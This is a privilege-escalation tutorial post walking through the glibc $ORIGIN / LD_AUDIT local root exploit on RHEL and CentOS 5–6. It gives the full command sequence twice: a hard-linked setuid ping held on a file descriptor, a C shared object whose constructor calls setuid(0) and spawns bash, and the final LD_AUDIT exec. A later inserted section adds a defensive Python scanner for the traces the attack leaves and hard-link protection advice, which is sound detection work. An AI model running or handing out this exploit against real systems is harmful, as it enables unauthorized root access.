Privilege escalation tutorial: GNU C Library dynamic linker $ORIGIN overflow privilege escalation

Admin, 2020-07-07, 102 views, 0 comments, category: privilege escalation tutorials

Uses /tmp directory permissions, the setuid bit and a small C program to escalate an ordinary account to root.


Applies to RHEL 5 through RHEL 6 and CentOS 5 through CentOS 6; all of them can be escalated this way.


Method


[moonsec@localhost tmp]$ mkdir /tmp/exploit
[moonsec@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhost tmp]$ exec 3< /tmp/exploit/target
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhost tmp]$ rm -rf /tmp/exploit/
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)


[moonsec@localhost tmp]$ cat > payload.c
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs as soon as the dynamic linker loads this shared object */
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}


[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami

 

Create the directory


mkdir /tmp/exploit


Create a hard link to the target file (ping is setuid root)


ln /bin/ping /tmp/exploit/target


Open the target file and keep it referenced from memory on file descriptor 3


exec 3< /tmp/exploit/target


Check the open descriptor for target


ls -l /proc/$$/fd/3


Delete the directory


rm -rf /tmp/exploit/


Enter the C code


cat > payload.c
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs as soon as the dynamic linker loads this shared object */
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}

Compile the file


gcc -w -fPIC -shared -o /tmp/exploit payload.c


Escalate to root

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
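The sequence above leaves two traces a defender can look for: a process whose environment carries an LD_AUDIT (or other loader) variable containing the $ORIGIN token, and a descriptor pointing at an unlinked file under a world-writable directory (the "(deleted)" entry shown in the ls output). The ln step also depends on a kernel that lets an unprivileged user hard-link a root-owned setuid binary. The script below is an added example, not code from the post or from the moonsec blog: it runs the two checks over constructed sample data that mirrors the session above, then over the live /proc tree, and reports whether the fs.protected_hardlinks sysctl (Linux 3.6 and later) is enabled. It assumes the standard Linux procfs layout (/proc/<pid>/environ, /proc/<pid>/fd/<n>) and a fixed list of writable directories; both are assumptions, not facts from the page.

```python
"""Added example (not part of the original post): audit a Linux host for the
traces left by the LD_AUDIT="$ORIGIN" / hard-linked setuid binary technique,
and report whether hard-link protection blocks the 'ln' step.

Assumptions: Linux procfs layout (/proc/<pid>/environ, /proc/<pid>/fd/<n>)
and the fs.protected_hardlinks sysctl (Linux 3.6+). Other users' environ and
fd entries are only readable by root or by the process owner."""
import os

# Assumed list of directories an unprivileged user can normally write to.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")
DELETED = " (deleted)"


def parse_environ(blob: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE blob of /proc/<pid>/environ."""
    env = {}
    for entry in blob.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def loader_var_findings(env: dict) -> list:
    """Flag dynamic-loader variables, especially ones carrying an $ORIGIN token."""
    findings = []
    for var in LOADER_VARS:
        value = env.get(var)
        if value is None:
            continue
        if "$ORIGIN" in value or "${ORIGIN}" in value:
            findings.append(f"{var} carries $ORIGIN expansion token: {value!r}")
        elif var == "LD_AUDIT":
            # LD_AUDIT is rare in legitimate sessions; worth a look on its own.
            findings.append(f"{var} is set: {value!r}")
    return findings


def fd_findings(fd_targets: dict) -> list:
    """fd_targets maps fd number -> readlink() result of /proc/<pid>/fd/<n>.
    A descriptor to an unlinked file under a writable directory is exactly the
    state 'exec 3<' followed by 'rm -rf' produces in the walkthrough above."""
    findings = []
    for fd, target in sorted(fd_targets.items()):
        if target.endswith(DELETED):
            path = target[: -len(DELETED)]
            if path.startswith(WRITABLE_DIRS):
                findings.append(f"fd {fd} -> unlinked file under writable dir: {path}")
    return findings


def scan_process(environ_blob: bytes, fd_targets: dict) -> list:
    """Run both checks for one process; an empty list means nothing suspicious."""
    return loader_var_findings(parse_environ(environ_blob)) + fd_findings(fd_targets)


def protected_hardlinks_enabled(sysctl_path="/proc/sys/fs/protected_hardlinks"):
    """True if fs.protected_hardlinks=1 (hard links to files you neither own nor
    can write are refused), False if 0, None if the kernel lacks the knob."""
    try:
        with open(sysctl_path) as fh:
            return fh.read().strip() == "1"
    except OSError:
        return None


def scan_live_proc() -> dict:
    """Walk /proc for every process this user may inspect; returns pid -> findings."""
    results = {}
    if not os.path.isdir("/proc"):
        return results
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/environ", "rb") as fh:
                blob = fh.read()
            fd_dir = f"/proc/{pid}/fd"
            targets = {int(n): os.readlink(f"{fd_dir}/{n}") for n in os.listdir(fd_dir)}
        except OSError:
            continue  # not our process, or it exited mid-scan
        found = scan_process(blob, targets)
        if found:
            results[int(pid)] = found
    return results


# Constructed sample data modelled on the session in the post (not captured output).
SAMPLE_ENVIRON = b"HOME=/home/moonsec\0LD_AUDIT=$ORIGIN\0SHELL=/bin/bash\0"
SAMPLE_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0",
              3: "/tmp/exploit/target (deleted)"}

if __name__ == "__main__":
    for line in scan_process(SAMPLE_ENVIRON, SAMPLE_FDS):
        print("sample:", line)
    print("fs.protected_hardlinks enabled:", protected_hardlinks_enabled())
    for pid, found in scan_live_proc().items():
        for line in found:
            print(f"pid {pid}: {line}")
```

Run it as root to cover every user's processes. A None result from protected_hardlinks_enabled() means the kernel offers no hard-link protection at all, so on such hosts the only real fix is the updated glibc package that stops expanding $ORIGIN for setuid programs; where the knob exists, setting fs.protected_hardlinks=1 additionally stops the ln step even on an unpatched glibc.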


On CentOS 5.5, user moonsec is escalated to root.
